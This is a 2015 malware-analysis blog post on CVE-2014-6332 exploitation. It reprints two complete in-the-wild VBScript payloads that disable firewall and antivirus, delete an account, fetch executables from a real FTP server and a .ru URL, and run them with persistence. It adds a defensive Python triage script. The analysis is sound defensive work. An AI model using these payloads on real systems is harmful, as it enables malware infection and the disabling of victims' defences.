Saturday, March 14, 2015

A Real World Story of CVE-2014-6332: RCE and Malware Download via VBScript!

Recently, we have observed in our analysis that exploit code for CVE-2014-6332 is either embedded directly in the web pages of infected websites or used as part of Browser Exploit Packs (BEPs) to download malware and execute commands remotely.

Earlier, we discussed how Chinese domains served nearly identical exploits taken from Metasploit (http://secniche.blogspot.com/2013/03/malware-retrospective-infected-chinese.html) to trigger infections. However, attackers tweak the structure of the exploits as required in order to carry out successful infections on the fly through compromised websites.

Let's discuss the vulnerability in question. From the Internet: "CVE-2014-6332: OleAut32.dll in OLE in Microsoft Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1 allows remote attackers to execute arbitrary code via a crafted web site, as demonstrated by an array-redimensioning attempt that triggers improper handling of a size value in the SafeArrayDimen function, aka 'Windows OLE Automation Array Remote Code Execution Vulnerability.'"

Refer to the Metasploit module (http://downloads.securityfocus.com/vulnerabilities/exploits/70952.rb) and the Microsoft advisory on the subject (https://technet.microsoft.com/en-us/library/security/ms14-064.aspx).

Trend Micro has already discussed this vulnerability (http://blog.trendmicro.com/trendlabs-security-intelligence/a-killer-combo-critical-vulnerability-and-godmode-exploitation-on-cve-2014-6332/), so we do not want to go into it in detail here.

Two variants of VBScript payload used in conjunction with this vulnerability have been found; they are discussed below. The primary structure of the exploit remains the same, but the payload is entirely determined by the VBScript code embedded in the web pages or BEPs.

As you can see, "cmd.exe" is invoked with the options "/q /c": "/q" turns command echoing off and "/c" runs the given command string and then exits, while the trailing 0 passed to shell.run hides the window, so the commands execute without any visible notification in the Windows GUI. Other insights:

The script deletes the "admin" user account, stops the "sharedaccess" service (Windows Firewall / Internet Connection Sharing), creates C:\RECYCLER as a staging directory, and kills the Norton "360.exe" process along with several other processes (360rp.exe, 360sd.exe, 360tray.exe, arp2.exe, 361.exe and, after a "ping 127.0.0.1 -n 200" delay, fp.exe, ftp.exe, arp1.exe, arp2.exe, fa1.exe, fa2.exe and fa.exe). It then copies ftp.exe to fp.exe, writes an FTP command script (fp.dw) that logs in to 104.152.215.90 and fetches a1.exe, arp2.exe, fa2.exe and cgud.exe into C:\RECYCLER, runs that script with "FP -s:", copies fa2.exe and arp2.exe into the All Users Start Menu\Programs\Startup folder (the Chinese-locale path seen in the script) for persistence, and launches the downloaded executables.

 <script language="VBScript">  
 function runmumaa()   
 On Error Resume Next  
 set shell=createobject("wscript.shell")  
 shell.run "cmd.exe /q /c net user admin /del",0  
 shell.run "cmd.exe /q /c sc stop sharedaccess",0  
 shell.run "cmd.exe /q /c md C:\RECYCLER",0  
 shell.run "cmd.exe /q /c taskkill /f /im 360rp.exe",0  
 shell.run "cmd.exe /q /c taskkill /f /im 360sd.exe",0  
 shell.run "cmd.exe /q /c taskkill /f /im 360tray.exe",0  
 shell.run "cmd.exe /q /c taskkill /f /im arp2.exe",0  
 shell.run "cmd.exe /q /c taskkill /f /im 360.exe",0  
 shell.run "cmd.exe /q /c taskkill /f /im 361.exe",0  
 shell.run "cmd.exe /q /c ping 127.0.0.1 -n 200&taskkill /f /im fp.exe&taskkill /f /im ftp.exe&taskkill /f /im arp1.exe&taskkill /f /im arp2.exe&taskkill /f /im fa1.exe&taskkill /f /im fa2.exe&taskkill /f /im fa.exe",0  
 shell.run "cmd.exe /q /c del C:\docume~1\alluse~1\「开始」菜单\程序\启动\360.exe",0  
 shell.run "cmd.exe /q /c del C:\docume~1\alluse~1\「开始」菜单\程序\启动\361.exe",0  
 shell.run "cmd.exe /q /c del C:\RECYCLER\360.exe",0  
 shell.run "cmd.exe /q /c del C:\RECYCLER\361.exe",0  
 shell.run "cmd.exe /q /c copy c:\windows\system32\ftp.exe C:\RECYCLER\fp.exe",0  
 shell.run "cmd.exe /q /c copy c:\windows\system32\ftp.exe c:\windows\system32\fp.exe",0  
 shell.run "cmd.exe /q /c copy %systemroot%\system32\ftp.exe %systemroot%\system32\fp.exe",0  
 shell.run "cmd.exe /q /c echo open 104.152.215.90>C:\RECYCLER\fp.dw&echo do1>>C:\RECYCLER\fp.dw&echo 123456>>C:\RECYCLER\fp.dw&echo bin >>C:\RECYCLER\fp.dw&echo get a1.exe C:\RECYCLER\a1.exe>>C:\RECYCLER\fp.dw&echo get arp2.exe C:\RECYCLER\arp2.exe>>C:\RECYCLER\fp.dw&echo get fa2.exe C:\RECYCLER\fa2.exe>>C:\RECYCLER\fp.dw&echo get cgud.exe C:\RECYCLER\cgud.exe>>C:\RECYCLER\fp.dw&echo bye >>C:\RECYCLER\fp.dw&ping 127.0.0.1 -n 10&FP -s:C:\RECYCLER\fp.dw&del C:\RECYCLER\fp.dw /q&copy C:\RECYCLER\fa2.exe C:\docume~1\alluse~1\「开始」菜单\程序\启动\fa2.exe&copy C:\RECYCLER\arp2.exe C:\docume~1\alluse~1\「开始」菜单\程序\启动\arp2.exe&start C:\RECYCLER\fa2.exe&start C:\RECYCLER\a1.exe&start C:\RECYCLER\cgud.exe&C:\RECYCLER\arp2.exe&del C:\RECYCLER\fp.exe",0  
 end function  
 </script>  

Another variant of the exploit payload is shown below. It highlights how HTTP requests are issued with MSXML2.XMLHTTP (the XMLHTTP object behind AJAX) to download the malware (http://natmasla.ru/ath/sploit/natmasla.exe; this link might still be active) directly, with the response body written to disk through ADODB.Stream. Note that the VBScript does not do this itself: it uses Shell.Application to run a cmd.exe command chain that echoes a second VBScript file (wUnlRLZR.vbs) into %TEMP%, runs it with cscript.exe and deletes it. WScript.Shell calls in that second script are then used to execute the malware.

 <script language="VBScript">  
 function runmumaa()   
 On Error Resume Next  
 set shell=createobject("Shell.Application")  
 shell.ShellExecute "cmd.exe", "/c CD %TEMP%&@echo Set objXMLHTTP=CreateObject(""MSXML2.XMLHTTP"")>wUnlRLZR.vbs&@echo objXMLHTTP.open ""GET"",""http://natmasla.ru/ath/sploit/natmasla.exe"",false>>wUnlRLZR.vbs&@echo objXMLHTTP.send()>>wUnlRLZR.vbs&@echo If objXMLHTTP.Status=200 Then>>wUnlRLZR.vbs&@echo Set objADOStream=CreateObject(""ADODB.Stream"")>>wUnlRLZR.vbs&@echo objADOStream.Open>>wUnlRLZR.vbs&@echo objADOStream.Type=1 >>wUnlRLZR.vbs&@echo objADOStream.Write objXMLHTTP.ResponseBody>>wUnlRLZR.vbs&@echo objADOStream.Position=0 >>wUnlRLZR.vbs&@echo objADOStream.SaveToFile ""%TEMP%\natmasla.exe"">>wUnlRLZR.vbs&@echo objADOStream.Close>>wUnlRLZR.vbs&@echo Set objADOStream=Nothing>>wUnlRLZR.vbs&@echo End if>>wUnlRLZR.vbs&@echo Set objXMLHTTP=Nothing>>wUnlRLZR.vbs&@echo Set objShell=CreateObject(""WScript.Shell"")>>wUnlRLZR.vbs&@echo objShell.Exec(""%TEMP%\natmasla.exe"")>>wUnlRLZR.vbs&cscript.exe %TEMP%\wUnlRLZR.vbs&del %TEMP%\wUnlRLZR.vbs", "", "open", 0  
 end function  
 </script>  
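Both variants share the same analyst's problem: the interesting part is a cmd.exe command chain packed into a VBScript string, and in the second variant the real downloader only exists as a series of "echo ... >> file" redirections. The following is an added example (not code from the original post) of static triage for this kind of payload: it flags the behaviours the two samples exhibit, pulls out the indicators a responder wants (remote hosts, killed image names, executable paths), and reconstructs whatever the chain writes to disk (the fp.dw FTP script of variant 1, the dropped .vbs of variant 2) without executing anything. SAMPLE_1 and SAMPLE_2 are constructed, abbreviated stand-ins for the page's two samples; every function and signature name is this example's own.

```python
"""Static triage of the two VBScript dropper variants shown above.

Added example, not code from the original post. It scans page/script text
for the behaviours both samples exhibit, extracts IoCs (remote hosts,
killed image names, executable paths), and rebuilds any file the payload
writes through cmd.exe "echo ... > file" chains. SAMPLE_1 and SAMPLE_2
are constructed, abbreviated stand-ins for the page's samples.
"""
import ipaddress
import re

# Behaviour signatures: label -> case-insensitive regex over the raw text.
# `"+` tolerates the doubled quotes VBScript uses inside string literals.
SIGNATURES = {
    "wscript_shell":     r'createobject\(\s*"+wscript\.shell"+\s*\)',
    "shell_application": r'createobject\(\s*"+shell\.application"+\s*\)',
    "quiet_cmd":         r'cmd\.exe\s+/q\s+/c',
    "taskkill":          r'taskkill\s+/f\s+/im\s+',
    "scripted_ftp":      r'\b(?:ftp|fp)(?:\.exe)?\s+-s:',  # ftp.exe -s:<script>, or the renamed fp
    "msxml_download":    r'msxml2\.xmlhttp',
    "adodb_savetofile":  r'adodb\.stream.*savetofile',
    "on_error_resume":   r'on\s+error\s+resume\s+next',
}


def find_signatures(text):
    """Sorted labels of every signature that matches."""
    return sorted(k for k, rx in SIGNATURES.items() if re.search(rx, text, re.I | re.S))


def extract_iocs(text):
    """Remote URLs/IPs, images killed with taskkill, and executable paths referenced."""
    ips = set()
    for ip in re.findall(r'\b(?:\d{1,3}\.){3}\d{1,3}\b', text):
        try:
            addr = ipaddress.ip_address(ip)
        except ValueError:
            continue
        if not (addr.is_loopback or addr.is_private):  # "ping 127.0.0.1 -n N" is a sleep, not C2
            ips.add(ip)
    return {
        "urls": sorted(set(re.findall(r'https?://[^\s"\'<>&]+', text, re.I))),
        "ips": sorted(ips),
        "killed": sorted({m.lower() for m in re.findall(r'taskkill\s+/f\s+/im\s+([^\s"&]+)', text, re.I)}),
        "exe_paths": sorted(set(re.findall(r'(?:[A-Za-z]:|%[A-Za-z]+%)\\[^\s"&>]*?\.exe\b', text, re.I))),
    }


def reconstruct_echo_files(text):
    """Rebuild files written by cmd.exe 'echo <line> >file' / '>>file' chains.

    The chain is split on single '&' (the cmd command separator); '>' starts
    a file and '>>' appends to it. Doubled quotes are unescaped because the
    chain sits inside a VBScript string literal, so the result is the second
    stage as it would land on disk, obtained without running it.
    """
    files = {}
    for segment in re.split(r'(?<!&)&(?!&)', text):
        m = re.search(r'(?:^|\s)@?echo\s+(.*?)\s*>(>?)\s*([^\s"&]+)', segment, re.I | re.S)
        if not m:
            continue
        line, append, target = m.group(1).replace('""', '"'), m.group(2), m.group(3)
        if not append or target not in files:
            files[target] = []
        files[target].append(line)
    return {target: "\n".join(lines) for target, lines in files.items()}


def triage(text):
    """Verdict plus the evidence behind it."""
    hits = find_signatures(text)
    shell = any(h in hits for h in ("wscript_shell", "shell_application"))
    fetch = any(h in hits for h in ("scripted_ftp", "msxml_download", "adodb_savetofile"))
    verdict = "dropper" if shell and fetch else "suspicious" if hits else "clean"
    return {"verdict": verdict, "signatures": hits, "iocs": extract_iocs(text),
            "written_files": reconstruct_echo_files(text)}


# Constructed, abbreviated stand-in for variant 1 (wscript.shell, cmd /q /c, scripted FTP).
SAMPLE_1 = r'''<script language="VBScript">
On Error Resume Next
set shell=createobject("wscript.shell")
shell.run "cmd.exe /q /c taskkill /f /im 360tray.exe",0
shell.run "cmd.exe /q /c copy c:\windows\system32\ftp.exe C:\RECYCLER\fp.exe",0
shell.run "cmd.exe /q /c echo open 104.152.215.90>C:\RECYCLER\fp.dw&echo do1>>C:\RECYCLER\fp.dw&echo 123456>>C:\RECYCLER\fp.dw&echo bin >>C:\RECYCLER\fp.dw&echo get a1.exe C:\RECYCLER\a1.exe>>C:\RECYCLER\fp.dw&echo bye >>C:\RECYCLER\fp.dw&ping 127.0.0.1 -n 10&FP -s:C:\RECYCLER\fp.dw&start C:\RECYCLER\a1.exe",0
</script>'''

# Constructed, abbreviated stand-in for variant 2 (Shell.Application, MSXML2.XMLHTTP, ADODB.Stream).
SAMPLE_2 = r'''<script language="VBScript">
On Error Resume Next
set shell=createobject("Shell.Application")
shell.ShellExecute "cmd.exe", "/c CD %TEMP%&@echo Set objXMLHTTP=CreateObject(""MSXML2.XMLHTTP"")>d.vbs&@echo objXMLHTTP.open ""GET"",""http://natmasla.ru/ath/sploit/natmasla.exe"",false>>d.vbs&@echo objXMLHTTP.send()>>d.vbs&@echo Set objADOStream=CreateObject(""ADODB.Stream"")>>d.vbs&@echo objADOStream.SaveToFile ""%TEMP%\natmasla.exe"">>d.vbs&@echo CreateObject(""WScript.Shell"").Exec(""%TEMP%\natmasla.exe"")>>d.vbs&cscript.exe %TEMP%\d.vbs&del %TEMP%\d.vbs", "", "open", 0
</script>'''

if __name__ == "__main__":
    for name, sample in (("variant 1", SAMPLE_1), ("variant 2", SAMPLE_2)):
        report = triage(sample)
        print(name, report["verdict"], report["signatures"], report["iocs"])
        for target, body in report["written_files"].items():
            print(f"--- reconstructed {target} ---\n{body}")
```

Run it on a saved copy of an infected page and the reconstructed files are the part worth reading first: for variant 1 they give the FTP server, credentials and file list in one place, and for variant 2 they give the second-stage VBScript in plain form, which is what a detection rule or a sandbox run would otherwise have to recover from disk. The signature list is deliberately small and keyed on behaviour (shell object plus a download primitive) rather than on file names, since the case study shows the names and paths change between variants while the structure does not.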

Publicly available exploits can be tweaked easily, as the case study above shows. It is really interesting to analyze the types of payloads and exploits used in the wild to exploit vulnerabilities in browsers.

Inference: openly available exploits are restructured by attackers and used in BEPs to trigger infections.